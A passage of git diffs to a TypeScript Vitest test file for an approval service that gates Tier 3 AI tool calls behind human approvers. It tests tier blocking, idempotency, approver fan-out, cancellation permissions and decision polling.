         details: expect.objectContaining({ errorCode: 'no_eligible_approvers' }),
       }),
     );
+  });
+});
+
+// ---------------------------------------------------------------------------
+// Connection-hold regression (#1105 class) — approver resolution must not
+// run inside the write transaction.
+// ---------------------------------------------------------------------------
+
+type MockLike = { mock: { calls: unknown[][]; invocationCallOrder: number[] } };
+
+describe('createActionIntent — connection-hold (#1105)', () => {
+  it('resolves every eligible-approver permission check before the write transaction inserts the intent row', async () => {
+    dbState.insertActionIntentsResults.push([makeIntentRow()]);
+    dbState.selectOrgUsersResults.push([
+      { userId: REQUESTER_ID },
+      { userId: APPROVER_1 },
+      { userId: APPROVER_2 },
+    ]);
+    permState.getUserPermissions.mockImplementation(async (userId: string) => ({ userId, canDecide: true }));
+    dbState.insertApprovalRequestsResults.push([{ id: 'approval-1' }, { id: 'approval-2' }]);
+
+    await createActionIntent(makeAuth(), baseInput());
+
+    // One getUserPermissions call per org member — confirms the approver
+    // resolution actually ran (not vacuously skipped).
+    expect(permState.getUserPermissions).toHaveBeenCalledTimes(3);
+
+    const insertMock = db.insert as unknown as MockLike;
+    const intentInsertIndex = insertMock.mock.calls.findIndex((call) => call[0] === schema.actionIntentsTbl);
+    expect(intentInsertIndex).toBeGreaterThanOrEqual(0);
+    const intentInsertOrder = insertMock.mock.invocationCallOrder[intentInsertIndex]!;
+
+    // invocationCallOrder is a global counter shared across every vi.fn in
+    // the test — safe to compare directly across mocks. Every permission
+    // check's call site must precede the intent-row insert, proving
+    // resolution completed before the write transaction opened (no pooled
+    // connection held across the N sequential round-trips).
+    const permCallOrders = (permState.getUserPermissions as unknown as MockLike).mock.invocationCallOrder;
+    expect(Math.max(...permCallOrders)).toBeLessThan(intentInsertOrder);
+
+    // withDbAccessContext must have opened a distinct (earlier) context for
+    // the members read, separate from the one wrapping the creation write.
+    const wrapMock = withDbAccessContext as unknown as MockLike;
+    expect(wrapMock.mock.invocationCallOrder.length).toBeGreaterThanOrEqual(2);
+    expect(Math.max(...permCallOrders)).toBeLessThan(wrapMock.mock.invocationCallOrder[1]!);
+
+    // Fan-out outcome itself is unchanged by the reordering.
+    const inserted = dbState.insertedApprovalRequestsValues[0] as Array<{ userId: string }>;
+    expect(inserted.map((r) => r.userId)).toEqual([APPROVER_1, APPROVER_2]);
   });
 });
 

--- a/apps/api/src/services/actionIntents/intentService.test.ts
+++ b/apps/api/src/services/actionIntents/intentService.test.ts
@@ -1,0 +1,553 @@
+import { describe, it, expect, vi, beforeEach } from 'vitest';
+import { canonicalizeArguments, computeArgumentDigest } from './canonicalize';
+
+// ---------------------------------------------------------------------------
+// Hoisted shared mock state
+// ---------------------------------------------------------------------------
+
+const { schema, dbState, authMock, guardrailMock, aiToolsState, permState, pushState, metricsMock } = vi.hoisted(() => {
+  const col = (name: string) => ({ name });
+  const actionIntentsTbl = {
+    id: col('id'),
+    orgId: col('org_id'),
+    idempotencyKey: col('idempotency_key'),
+    status: col('status'),
+  };
+  const approvalRequestsTbl = { id: col('id'), intentId: col('intent_id') };
+  const organizationUsersTbl = { userId: col('user_id'), orgId: col('org_id') };
+  const intentOutboxTbl = { id: col('id'), intentId: col('intent_id') };
+
+  return {
+    schema: { actionIntentsTbl, approvalRequestsTbl, organizationUsersTbl, intentOutboxTbl },
+    dbState: {
+      insertActionIntentsResults: [] as unknown[][],
+      insertApprovalRequestsResults: [] as unknown[][],
+      selectActionIntentsResults: [] as unknown[][],
+      selectApprovalRequestsResults: [] as unknown[][],
+      selectOrgUsersResults: [] as unknown[][],
+      updateActionIntentsResults: [] as unknown[][],
+      insertedActionIntentValues: [] as Record<string, unknown>[],
+      insertedApprovalRequestsValues: [] as unknown[],
+      insertedOutboxValues: [] as Record<string, unknown>[],
+      updateActionIntentsSets: [] as Record<string, unknown>[],
+      updateActionIntentsWheres: [] as unknown[],
+    },
+    authMock: { dbAccessContextFromAuth: vi.fn((auth: { scope: string; orgId: string | null; accessibleOrgIds: string[] | null; user: { id: string } }) => ({
+      scope: auth.scope,
+      orgId: auth.orgId,
+      accessibleOrgIds: auth.accessibleOrgIds,
+      userId: auth.user.id,
+    })) },
+    guardrailMock: { checkGuardrails: vi.fn() },
+    aiToolsState: {
+      tools: new Map<string, { definition: { description?: string } }>(),
+      resolveWritableToolOrgId: vi.fn(),
+    },
+    permState: {
+      getUserPermissions: vi.fn(),
+      userCanDecideApprovals: vi.fn((perms: { canDecide?: boolean } | null) => !!perms?.canDecide),
+    },
+    pushState: {
+      getUserPushTokens: vi.fn(async () => []),
+      dispatchApprovalPushToTokens: vi.fn(async () => ({ tokensFound: 0, dispatched: 0, errors: 0 })),
+    },
+    metricsMock: { recordActionIntentEvent: vi.fn() },
+  };
+});
+
+function resultBox(getResult: () => unknown) {
+  return {
+    then: (res: (v: unknown) => unknown, rej?: (e: unknown) => unknown) => Promise.resolve(getResult()).then(res, rej),
+    catch: (rej: (e: unknown) => unknown) => Promise.resolve(getResult()).catch(rej),
+    limit: vi.fn(() => resultBox(getResult)),
+  };
+}
+
+vi.mock('../../db', () => ({
+  db: {
+    insert: vi.fn((table: unknown) => ({
+      values: vi.fn((values: unknown) => {
+        if (table === schema.actionIntentsTbl) {
+          dbState.insertedActionIntentValues.push(values as Record<string, unknown>);
+          return {
+            onConflictDoNothing: vi.fn(() => ({
+              returning: vi.fn(async () => dbState.insertActionIntentsResults.shift() ?? []),
+            })),
+          };
+        }
+        if (table === schema.approvalRequestsTbl) {
+          dbState.insertedApprovalRequestsValues.push(values);
+          return {
+            returning: vi.fn(async () => dbState.insertApprovalRequestsResults.shift() ?? []),
+          };
+        }
+        if (table === schema.intentOutboxTbl) {
+          dbState.insertedOutboxValues.push(values as Record<string, unknown>);
+          return Promise.resolve(undefined);
+        }
+        throw new Error('unexpected insert table in mock');
+      }),
+    })),
+    select: vi.fn(() => ({
+      from: vi.fn((table: unknown) => ({
+        where: vi.fn(() => {
+          if (table === schema.actionIntentsTbl) {
+            return resultBox(() => dbState.selectActionIntentsResults.shift() ?? []);
+          }
+          if (table === schema.approvalRequestsTbl) {
+            return resultBox(() => dbState.selectApprovalRequestsResults.shift() ?? []);
+          }
+          if (table === schema.organizationUsersTbl) {
+            return resultBox(() => dbState.selectOrgUsersResults.shift() ?? []);
+          }
+          throw new Error('unexpected select table in mock');
+        }),
+      })),
+    })),
+    update: vi.fn((table: unknown) => ({
+      set: vi.fn((setVals: Record<string, unknown>) => {
+        if (table !== schema.actionIntentsTbl) throw new Error('unexpected update table in mock');
+        dbState.updateActionIntentsSets.push(setVals);
+        return {
+          where: vi.fn((whereCond: unknown) => {
+            dbState.updateActionIntentsWheres.push(whereCond);
+            return {
+              returning: vi.fn(async () => dbState.updateActionIntentsResults.shift() ?? []),
+            };
+          }),
+        };
+      }),
+    })),
+  },
+  withDbAccessContext: vi.fn(async (_ctx: unknown, fn: () => Promise<unknown>) => fn()),
+  withSystemDbAccessContext: vi.fn(async (fn: () => Promise<unknown>) => fn()),
+}));
+
+vi.mock('../../db/schema/actionIntents', () => ({
+  actionIntents: schema.actionIntentsTbl,
+  intentOutbox: schema.intentOutboxTbl,
+}));
+
+vi.mock('../../db/schema/approvals', () => ({
+  approvalRequests: schema.approvalRequestsTbl,
+}));
+
+vi.mock('../../db/schema/users', () => ({
+  organizationUsers: schema.organizationUsersTbl,
+}));
+
+vi.mock('../../middleware/auth', () => ({
+  dbAccessContextFromAuth: authMock.dbAccessContextFromAuth,
+}));
+
+vi.mock('../aiTools', () => ({
+  aiTools: aiToolsState.tools,
+  resolveWritableToolOrgId: aiToolsState.resolveWritableToolOrgId,
+}));
+
+vi.mock('../aiGuardrails', () => ({
+  checkGuardrails: guardrailMock.checkGuardrails,
+}));
+
+vi.mock('../permissions', () => ({
+  getUserPermissions: permState.getUserPermissions,
+  userCanDecideApprovals: permState.userCanDecideApprovals,
+}));
+
+vi.mock('../expoPush', () => ({
+  getUserPushTokens: pushState.getUserPushTokens,
+  dispatchApprovalPushToTokens: pushState.dispatchApprovalPushToTokens,
+}));
+
+vi.mock('./metrics', () => ({
+  recordActionIntentEvent: metricsMock.recordActionIntentEvent,
+}));
+
+vi.mock('drizzle-orm', () => ({
+  eq: vi.fn((...args: unknown[]) => ({ op: 'eq', args })),
+  and: vi.fn((...args: unknown[]) => ({ op: 'and', args })),
+  inArray: vi.fn((...args: unknown[]) => ({ op: 'inArray', args })),
+}));
+
+// ---------------------------------------------------------------------------
+// Import under test (after mocks)
+// ---------------------------------------------------------------------------
+
+import {
+  createActionIntent,
+  getActionIntent,
+  cancelActionIntent,
+  transitionIntent,
+  ActionIntentTierError,
+  ActionIntentNotFoundError,
+  ActionIntentAuthorizationError,
+  type CreateActionIntentInput,
+} from './intentService';
+
+// ---------------------------------------------------------------------------
+// Test fixtures
+// ---------------------------------------------------------------------------
+
+const ORG_ID = '11111111-1111-4111-8111-111111111111';
+const REQUESTER_ID = '22222222-2222-4222-8222-222222222222';
+const APPROVER_1 = '33333333-3333-4333-8333-333333333333';
+const APPROVER_2 = '44444444-4444-4444-8444-444444444444';
+
+function makeAuth() {
+  return {
+    user: { id: REQUESTER_ID, email: 'req@example.com', name: 'Requester' },
+    orgId: ORG_ID,
+    scope: 'organization' as const,
+    accessibleOrgIds: [ORG_ID],
+  } as unknown as Parameters<typeof createActionIntent>[0];
+}
+
+function baseInput(overrides?: Partial<CreateActionIntentInput>): CreateActionIntentInput {
+  return {
+    toolName: 'run_script',
+    input: { scriptId: 'script-1', deviceIds: ['device-1'] },
+    source: 'chat',
+    ...overrides,
+  };
+}
+
+function resetDbState() {
+  dbState.insertActionIntentsResults.length = 0;
+  dbState.insertApprovalRequestsResults.length = 0;
+  dbState.selectActionIntentsResults.length = 0;
+  dbState.selectApprovalRequestsResults.length = 0;
+  dbState.selectOrgUsersResults.length = 0;
+  dbState.updateActionIntentsResults.length = 0;
+  dbState.insertedActionIntentValues.length = 0;
+  dbState.insertedApprovalRequestsValues.length = 0;
+  dbState.insertedOutboxValues.length = 0;
+  dbState.updateActionIntentsSets.length = 0;
+  dbState.updateActionIntentsWheres.length = 0;
+}
+
+function makeIntentRow(overrides?: Record<string, unknown>) {
+  return {
+    id: 'intent-1',
+    orgId: ORG_ID,
+    requestedByUserId: REQUESTER_ID,
+    requestingApiKeyId: null,
+    source: 'chat',
+    requestingClientLabel: 'Breeze AI',
+    actionName: 'run_script',
+    actionVersion: 1,
+    arguments: { scriptId: 'script-1', deviceIds: ['device-1'] },
+    argumentDigest: computeArgumentDigest(canonicalizeArguments({ scriptId: 'script-1', deviceIds: ['device-1'] })),
+    targetSummary: 'run_script(...)',
+    impactSummary: 'Execute run_script',
+    reason: null,
+    riskTier: 3,
+    connectionId: null,
+    tenantId: null,
+    idempotencyKey: 'idem-1',
+    correlationId: 'corr-1',
+    status: 'pending_approval',
+    createdAt: new Date(),
+    expiresAt: new Date(Date.now() + 300_000),
+    decidedAt: null,
+    decidedByUserId: null,
+    decidedAssuranceLevel: null,
+    decidedVia: null,
+    executedAt: null,
+    result: null,
+    errorCode: null,
+    ...overrides,
+  };
+}
+
+beforeEach(() => {
+  resetDbState();
+  vi.clearAllMocks();
+  aiToolsState.tools.clear();
+  aiToolsState.resolveWritableToolOrgId.mockReturnValue({ orgId: ORG_ID });
+  guardrailMock.checkGuardrails.mockReturnValue({
+    tier: 3,
+    allowed: true,
+    requiresApproval: true,
+    description: 'Run a script on one or more devices',
+  });
+  permState.getUserPermissions.mockResolvedValue(null);
+  permState.userCanDecideApprovals.mockImplementation((perms: { canDecide?: boolean } | null) => !!perms?.canDecide);
+  pushState.getUserPushTokens.mockResolvedValue([]);
+  pushState.dispatchApprovalPushToTokens.mockResolvedValue({ tokensFound: 0, dispatched: 0, errors: 0 });
+});
+
+// ---------------------------------------------------------------------------
+// Tier gating
+// ---------------------------------------------------------------------------
+
+describe('createActionIntent — tier gating', () => {
+  it('rejects a Tier <=2 tool as not-an-intent-path', async () => {
+    guardrailMock.checkGuardrails.mockReturnValue({ tier: 2, allowed: true, requiresApproval: false });
+    await expect(createActionIntent(makeAuth(), baseInput())).rejects.toMatchObject({
+      code: 'tool_not_tier3',
+    });
+    await expect(createActionIntent(makeAuth(), baseInput())).rejects.toBeInstanceOf(ActionIntentTierError);
+    expect(dbState.insertedActionIntentValues).toHaveLength(0);
+  });
+
+  it('refuses a Tier 4 (blocked) tool outright', async () => {
+    guardrailMock.checkGuardrails.mockReturnValue({
+      tier: 4,
+      allowed: false,
+      requiresApproval: false,
+      reason: 'Unknown tool: delete_everything',
+    });
+    await expect(createActionIntent(makeAuth(), baseInput({ toolName: 'delete_everything' }))).rejects.toMatchObject({
+      code: 'tool_blocked',
+    });
+    expect(dbState.insertedActionIntentValues).toHaveLength(0);
+  });
+});
+
+// ---------------------------------------------------------------------------
+// Digest stability
+// ---------------------------------------------------------------------------
+
+describe('createActionIntent — digest stability', () => {
+  it('computes the same argument_digest for canonically-equivalent input regardless of key order', async () => {
+    const inputA = { b: 1, a: { z: 2, y: 3 } };
+    const inputB = { a: { y: 3, z: 2 }, b: 1 };
+    const expectedDigest = computeArgumentDigest(canonicalizeArguments(inputA));
+
+    dbState.selectOrgUsersResults.push([]);
+    dbState.insertActionIntentsResults.push([makeIntentRow({ id: 'intent-a', status: 'cancelled', errorCode: 'no_eligible_approvers' })]);
+    dbState.updateActionIntentsResults.push([makeIntentRow({ id: 'intent-a', status: 'cancelled', errorCode: 'no_eligible_approvers' })]);
+    await createActionIntent(makeAuth(), baseInput({ input: inputA, idempotencyKey: 'key-a' }));
+    expect(dbState.insertedActionIntentValues[0]?.argumentDigest).toBe(expectedDigest);
+
+    dbState.selectOrgUsersResults.push([]);
+    dbState.insertActionIntentsResults.push([makeIntentRow({ id: 'intent-b', status: 'cancelled', errorCode: 'no_eligible_approvers' })]);
+    dbState.updateActionIntentsResults.push([makeIntentRow({ id: 'intent-b', status: 'cancelled', errorCode: 'no_eligible_approvers' })]);
+    await createActionIntent(makeAuth(), baseInput({ input: inputB, idempotencyKey: 'key-b' }));
+    expect(dbState.insertedActionIntentValues[1]?.argumentDigest).toBe(expectedDigest);
+  });
+});
+
+// ---------------------------------------------------------------------------
+// Idempotency
+// ---------------------------------------------------------------------------
+
+describe('createActionIntent — idempotency', () => {
+  it('returns the existing snapshot on a conflicting (org_id, idempotency_key) instead of creating a duplicate', async () => {
+    // onConflictDoNothing().returning() → [] signals a conflict.
+    dbState.insertActionIntentsResults.push([]);
+    const existing = makeIntentRow({ id: 'existing-intent', status: 'approved' });
+    dbState.selectActionIntentsResults.push([existing]);
+    dbState.selectApprovalRequestsResults.push([{ id: 'approval-existing' }]);
+
+    const snapshot = await createActionIntent(makeAuth(), baseInput({ idempotencyKey: 'fixed-key' }));
+
+    expect(snapshot.id).toBe('existing-intent');
+    expect(snapshot.status).toBe('approved');
+    expect(snapshot.approvalRequestIds).toEqual(['approval-existing']);
+    // No new approver resolution or fan-out happened.
+    expect(dbState.insertedApprovalRequestsValues).toHaveLength(0);
+    expect(dbState.insertedOutboxValues).toHaveLength(0);
+    expect(permState.getUserPermissions).not.toHaveBeenCalled();
+    // No push/audit noise on a pure replay.
+    expect(pushState.dispatchApprovalPushToTokens).not.toHaveBeenCalled();
+    expect(metricsMock.recordActionIntentEvent).not.toHaveBeenCalled();
+  });
+});
+
+// ---------------------------------------------------------------------------
+// Approver fan-out
+// ---------------------------------------------------------------------------
+
+describe('createActionIntent — approver fan-out', () => {
+  it('excludes the requester from the fanned-out approval rows', async () => {
+    dbState.insertActionIntentsResults.push([makeIntentRow()]);
+    dbState.selectOrgUsersResults.push([
+      { userId: REQUESTER_ID },
+      { userId: APPROVER_1 },
+      { userId: APPROVER_2 },
+    ]);
+    permState.getUserPermissions.mockImplementation(async (userId: string) => ({ userId, canDecide: true }));
+    dbState.insertApprovalRequestsResults.push([{ id: 'approval-1' }, { id: 'approval-2' }]);
+
+    const snapshot = await createActionIntent(makeAuth(), baseInput());
+
+    expect(snapshot.status).toBe('pending_approval');
+    expect(snapshot.approvalRequestIds).toEqual(['approval-1', 'approval-2']);
+    const inserted = dbState.insertedApprovalRequestsValues[0] as Array<{ userId: string }>;
+    expect(inserted.map((r) => r.userId)).toEqual([APPROVER_1, APPROVER_2]);
+    expect(inserted.every((r) => r.userId !== REQUESTER_ID)).toBe(true);
+
+    expect(dbState.insertedOutboxValues).toHaveLength(1);
+    expect(dbState.insertedOutboxValues[0]).toMatchObject({
+      intentId: 'intent-1',
+      eventType: 'intent_created',
+    });
+    expect(metricsMock.recordActionIntentEvent).toHaveBeenCalledWith(
+      expect.objectContaining({ outcome: 'created', intentId: 'intent-1' }),
+    );
+  });
+
+  it('creates a single sole-operator row when the requester is the only eligible approver', async () => {
+    dbState.insertActionIntentsResults.push([makeIntentRow()]);
+    dbState.selectOrgUsersResults.push([{ userId: REQUESTER_ID }]);
+    permState.getUserPermissions.mockImplementation(async (userId: string) =>
+      userId === REQUESTER_ID ? { userId, canDecide: true } : null,
+    );
+    dbState.insertApprovalRequestsResults.push([{ id: 'approval-solo' }]);
+
+    const snapshot = await createActionIntent(makeAuth(), baseInput());
+
+    expect(snapshot.status).toBe('pending_approval');
+    expect(snapshot.approvalRequestIds).toEqual(['approval-solo']);
+    const inserted = dbState.insertedApprovalRequestsValues[0] as Array<{ userId: string }>;
+    expect(inserted).toHaveLength(1);
+    expect(inserted[0]?.userId).toBe(REQUESTER_ID);
+    expect(metricsMock.recordActionIntentEvent).toHaveBeenCalledWith(
+      expect.objectContaining({ details: expect.objectContaining({ soleOperator: true }) }),
+    );
+  });
+
+  it('creates the intent then immediately cancels it when no one is eligible (not even the requester)', async () => {
+    dbState.insertActionIntentsResults.push([makeIntentRow()]);
+    dbState.selectOrgUsersResults.push([{ userId: REQUESTER_ID }, { userId: APPROVER_1 }]);
+    permState.getUserPermissions.mockResolvedValue(null); // nobody passes userCanDecideApprovals
+    dbState.updateActionIntentsResults.push([
+      makeIntentRow({ status: 'cancelled', errorCode: 'no_eligible_approvers' }),
+    ]);
+
+    const snapshot = await createActionIntent(makeAuth(), baseInput());
+
+    expect(snapshot.status).toBe('cancelled');
+    expect(snapshot.errorCode).toBe('no_eligible_approvers');
+    expect(snapshot.approvalRequestIds).toEqual([]);
+    expect(dbState.insertedApprovalRequestsValues).toHaveLength(0);
+    expect(dbState.updateActionIntentsSets[0]).toMatchObject({
+      status: 'cancelled',
+      errorCode: 'no_eligible_approvers',
+    });
+    // Outbox row is still written (creation itself still happened).
+    expect(dbState.insertedOutboxValues).toHaveLength(1);
+    // No push for a cancelled intent.
+    expect(pushState.dispatchApprovalPushToTokens).not.toHaveBeenCalled();
+    expect(metricsMock.recordActionIntentEvent).toHaveBeenCalledWith(
+      expect.objectContaining({
+        outcome: 'cancelled',
+        details: expect.objectContaining({ errorCode: 'no_eligible_approvers' }),
+      }),
+    );
+  });
+});
+
+// ---------------------------------------------------------------------------
+// Outbox (same-transaction write)
+// ---------------------------------------------------------------------------
+
+describe('createActionIntent — transactional outbox', () => {
+  it('writes exactly one intent_created outbox row carrying only ids, no argument content', async () => {
+    dbState.insertActionIntentsResults.push([makeIntentRow()]);
+    dbState.selectOrgUsersResults.push([{ userId: APPROVER_1 }]);
+    permState.getUserPermissions.mockResolvedValue({ canDecide: true });
+    dbState.insertApprovalRequestsResults.push([{ id: 'approval-1' }]);
+
+    await createActionIntent(makeAuth(), baseInput());
+
+    expect(dbState.insertedOutboxValues).toHaveLength(1);
+    const payload = dbState.insertedOutboxValues[0];
+    expect(payload).toMatchObject({ intentId: 'intent-1', eventType: 'intent_created' });
+    expect(payload?.payload).toEqual({ intentId: 'intent-1', orgId: ORG_ID });
+  });
+});
+
+// ---------------------------------------------------------------------------
+// transitionIntent CAS primitive
+// ---------------------------------------------------------------------------
+
+describe('transitionIntent', () => {
+  it('returns true when the CAS update affects a row', async () => {
+    dbState.updateActionIntentsResults.push([{ id: 'intent-1' }]);
+    const ok = await transitionIntent('intent-1', 'pending_approval', 'approved');
+    expect(ok).toBe(true);
+    expect(dbState.updateActionIntentsSets[0]).toMatchObject({ status: 'approved' });
+  });
+
+  it('returns false (not throw) on a lost race — zero rows affected', async () => {
+    dbState.updateActionIntentsResults.push([]);
+    await expect(transitionIntent('intent-1', 'pending_approval', 'approved')).resolves.toBe(false);
+  });
+
+  it('accepts an array of starting states', async () => {
+    dbState.updateActionIntentsResults.push([{ id: 'intent-1' }]);
+    const ok = await transitionIntent('intent-1', ['pending_approval', 'approved'], 'cancelled');
+    expect(ok).toBe(true);
+  });
+
+  it('applies a lifecycle patch alongside the status change', async () => {
+    dbState.updateActionIntentsResults.push([{ id: 'intent-1' }]);
+    await transitionIntent('intent-1', 'approved', 'executing', { executedAt: new Date('2026-01-01') });
+    expect(dbState.updateActionIntentsSets[0]).toMatchObject({
+      status: 'executing',
+      executedAt: new Date('2026-01-01'),
+    });
+  });
+});
+
+// ---------------------------------------------------------------------------
+// getActionIntent
+// ---------------------------------------------------------------------------
+
+describe('getActionIntent', () => {
+  it('returns null when the intent does not exist (or is invisible under RLS)', async () => {
+    dbState.selectActionIntentsResults.push([]);
+    const result = await getActionIntent(makeAuth(), 'missing-intent');
+    expect(result).toBeNull();
+  });
+
+  it('returns a snapshot with approval request ids when found', async () => {
+    dbState.selectActionIntentsResults.push([makeIntentRow({ id: 'intent-1' })]);
+    dbState.selectApprovalRequestsResults.push([{ id: 'approval-1' }, { id: 'approval-2' }]);
+    const result = await getActionIntent(makeAuth(), 'intent-1');
+    expect(result?.id).toBe('intent-1');
+    expect(result?.approvalRequestIds).toEqual(['approval-1', 'approval-2']);
+  });
+});
+
+// ---------------------------------------------------------------------------
+// cancelActionIntent
+// ---------------------------------------------------------------------------
+
+describe('cancelActionIntent', () => {
+  it('throws ActionIntentNotFoundError when the intent does not exist', async () => {
+    dbState.selectActionIntentsResults.push([]);
+    await expect(cancelActionIntent(makeAuth(), 'missing')).rejects.toBeInstanceOf(ActionIntentNotFoundError);
+  });
+
+  it('allows the requester to cancel their own pending intent', async () => {
+    dbState.selectActionIntentsResults.push([makeIntentRow({ id: 'intent-1', requestedByUserId: REQUESTER_ID })]);
+    dbState.updateActionIntentsResults.push([{ id: 'intent-1' }]);
+    const result = await cancelActionIntent(makeAuth(), 'intent-1');
+    expect(result).toEqual({ ok: true, status: 'cancelled' });
+  });
+
+  it('rejects a non-requester without approvals:decide', async () => {
+    dbState.selectActionIntentsResults.push([makeIntentRow({ id: 'intent-1', requestedByUserId: APPROVER_1 })]);
+    permState.getUserPermissions.mockResolvedValue(null);
+    await expect(cancelActionIntent(makeAuth(), 'intent-1')).rejects.toBeInstanceOf(ActionIntentAuthorizationError);
+  });
+
+  it('allows an eligible approver (non-requester) to cancel', async () => {
+    dbState.selectActionIntentsResults.push([makeIntentRow({ id: 'intent-1', requestedByUserId: APPROVER_1 })]);
+    permState.getUserPermissions.mockResolvedValue({ canDecide: true });
+    dbState.updateActionIntentsResults.push([{ id: 'intent-1' }]);
+    const result = await cancelActionIntent(makeAuth(), 'intent-1');
+    expect(result).toEqual({ ok: true, status: 'cancelled' });
+  });
+
+  it('reports the lost race with the current status when the CAS affects zero rows', async () => {
+    dbState.selectActionIntentsResults.push([makeIntentRow({ id: 'intent-1', requestedByUserId: REQUESTER_ID })]);
+    dbState.updateActionIntentsResults.push([]); // CAS lost
+    dbState.selectActionIntentsResults.push([{ status: 'completed' }]); // re-read
+    const result = await cancelActionIntent(makeAuth(), 'intent-1');
+    expect(result).toEqual({ ok: false, status: 'completed' });
+  });
+});

--- a/apps/api/src/services/actionIntents/intentService.test.ts
+++ b/apps/api/src/services/actionIntents/intentService.test.ts
@@ -178,6 +178,7 @@ import {
   getActionIntent,
   cancelActionIntent,
   transitionIntent,
+  waitForIntentDecision,
   ActionIntentTierError,
   ActionIntentNotFoundError,
   ActionIntentAuthorizationError,
@@ -599,5 +600,65 @@ describe('cancelActionIntent', () => {
     dbState.selectActionIntentsResults.push([{ status: 'completed' }]); // re-read
     const result = await cancelActionIntent(makeAuth(), 'intent-1');
     expect(result).toEqual({ ok: false, status: 'completed' });
+  });
+});
+
+// ---------------------------------------------------------------------------
+// waitForIntentDecision — chat SDK's blocking poll (spec §6.1)
+// ---------------------------------------------------------------------------
+
+describe('waitForIntentDecision', () => {
+  it('returns promptly, without sleeping, once the status leaves pending_approval', async () => {
+    dbState.selectActionIntentsResults.push([{ status: 'approved' }]);
+    const result = await waitForIntentDecision('intent-1', 5000);
+    expect(result).toBe('approved');
+  });
+
+  it('returns each of the non-pending terminal-ish statuses verbatim', async () => {
+    for (const status of ['rejected', 'expired', 'cancelled', 'executing', 'completed', 'failed'] as const) {
+      dbState.selectActionIntentsResults.push([{ status }]);
+      // eslint-disable-next-line no-await-in-loop
+      await expect(waitForIntentDecision('intent-1', 5000)).resolves.toBe(status);
+    }
+  });
+
+  it('never mutates the intent — only ever reads via db.select', async () => {
+    dbState.selectActionIntentsResults.push([{ status: 'rejected' }]);
+    await waitForIntentDecision('intent-1', 5000);
+    expect(dbState.updateActionIntentsSets).toHaveLength(0);
+  });
+
+  it('polls again on pending_approval and returns the last-read status when the timeout elapses', async () => {
+    vi.useFakeTimers();
+    try {
+      // Every poll still observes pending_approval — plenty of reads queued
+      // so the loop never runs dry before the timeout fires.
+      for (let i = 0; i < 10; i++) {
+        dbState.selectActionIntentsResults.push([{ status: 'pending_approval' }]);
+      }
+      const promise = waitForIntentDecision('intent-1', 1200);
+      await vi.advanceTimersByTimeAsync(2000);
+      const result = await promise;
+      expect(result).toBe('pending_approval');
+      // More than one read happened — it actually polled, not just checked once.
+      expect(dbState.selectActionIntentsResults.length).toBeLessThan(10);
+    } finally {
+      vi.useRealTimers();
+    }
+  });
+
+  it('stops polling immediately and returns the last-read (initial) status when the signal is already aborted', async () => {
+    const controller = new AbortController();
+    controller.abort();
+    const result = await waitForIntentDecision('intent-1', 5000, controller.signal);
+    expect(result).toBe('pending_approval');
+    // Aborted before the first read — no db call made.
+    expect(dbState.selectActionIntentsResults).toHaveLength(0);
+  });
+
+  it('returns the pending_approval default when the intent row cannot be found', async () => {
+    dbState.selectActionIntentsResults.push([]);
+    const result = await waitForIntentDecision('missing-intent', 5000);
+    expect(result).toBe('pending_approval');
   });
 });

--- a/apps/api/src/services/actionIntents/intentService.test.ts
+++ b/apps/api/src/services/actionIntents/intentService.test.ts
@@ -5,7 +5,7 @@ import { canonicalizeArguments, computeArgumentDigest } from './canonicalize';
 // Hoisted shared mock state
 // ---------------------------------------------------------------------------
 
-const { schema, dbState, authMock, guardrailMock, aiToolsState, permState, pushState, metricsMock } = vi.hoisted(() => {
+const { schema, dbState, authMock, guardrailMock, aiToolsState, permState, pushState, metricsMock, intentApproversState } = vi.hoisted(() => {
   const col = (name: string) => ({ name });
   const actionIntentsTbl = {
     id: col('id'),
@@ -14,17 +14,15 @@ const { schema, dbState, authMock, guardrailMock, aiToolsState, permState, pushS
     status: col('status'),
   };
   const approvalRequestsTbl = { id: col('id'), intentId: col('intent_id') };
-  const organizationUsersTbl = { userId: col('user_id'), orgId: col('org_id') };
   const intentOutboxTbl = { id: col('id'), intentId: col('intent_id') };
 
   return {
-    schema: { actionIntentsTbl, approvalRequestsTbl, organizationUsersTbl, intentOutboxTbl },
+    schema: { actionIntentsTbl, approvalRequestsTbl, intentOutboxTbl },
     dbState: {
       insertActionIntentsResults: [] as unknown[][],
       insertApprovalRequestsResults: [] as unknown[][],
       selectActionIntentsResults: [] as unknown[][],
       selectApprovalRequestsResults: [] as unknown[][],
-      selectOrgUsersResults: [] as unknown[][],
       updateActionIntentsResults: [] as unknown[][],
       insertedActionIntentValues: [] as Record<string, unknown>[],
       insertedApprovalRequestsValues: [] as unknown[],
@@ -52,6 +50,11 @@ const { schema, dbState, authMock, guardrailMock, aiToolsState, permState, pushS
       dispatchApprovalPushToTokens: vi.fn(async () => ({ tokensFound: 0, dispatched: 0, errors: 0 })),
     },
     metricsMock: { recordActionIntentEvent: vi.fn() },
+    // CRITICAL-2: approver resolution is now a single opaque resolver call
+    // (org + partner axis) instead of an organization_users select + N
+    // getUserPermissions round-trips, so it's mocked wholesale here rather
+    // than reconstructed from db-table mocks.
+    intentApproversState: { resolveIntentApprovers: vi.fn(async () => [] as string[]) },
   };
 });
 
@@ -97,9 +100,6 @@ vi.mock('../../db', () => ({
           if (table === schema.approvalRequestsTbl) {
             return resultBox(() => dbState.selectApprovalRequestsResults.shift() ?? []);
           }
-          if (table === schema.organizationUsersTbl) {
-            return resultBox(() => dbState.selectOrgUsersResults.shift() ?? []);
-          }
           throw new Error('unexpected select table in mock');
         }),
       })),
@@ -132,8 +132,8 @@ vi.mock('../../db/schema/approvals', () => ({
   approvalRequests: schema.approvalRequestsTbl,
 }));
 
-vi.mock('../../db/schema/users', () => ({
-  organizationUsers: schema.organizationUsersTbl,
+vi.mock('./intentApprovers', () => ({
+  resolveIntentApprovers: intentApproversState.resolveIntentApprovers,
 }));
 
 vi.mock('../../middleware/auth', () => ({
@@ -194,11 +194,13 @@ const ORG_ID = '11111111-1111-4111-8111-111111111111';
 const REQUESTER_ID = '22222222-2222-4222-8222-222222222222';
 const APPROVER_1 = '33333333-3333-4333-8333-333333333333';
 const APPROVER_2 = '44444444-4444-4444-8444-444444444444';
+const PARTNER_ID = '55555555-5555-4555-8555-555555555555';
 
-function makeAuth() {
+function makeAuth(overrides?: { partnerId?: string | null }) {
   return {
     user: { id: REQUESTER_ID, email: 'req@example.com', name: 'Requester' },
     orgId: ORG_ID,
+    partnerId: overrides?.partnerId ?? null,
     scope: 'organization' as const,
     accessibleOrgIds: [ORG_ID],
   } as unknown as Parameters<typeof createActionIntent>[0];
@@ -218,7 +220,6 @@ function resetDbState() {
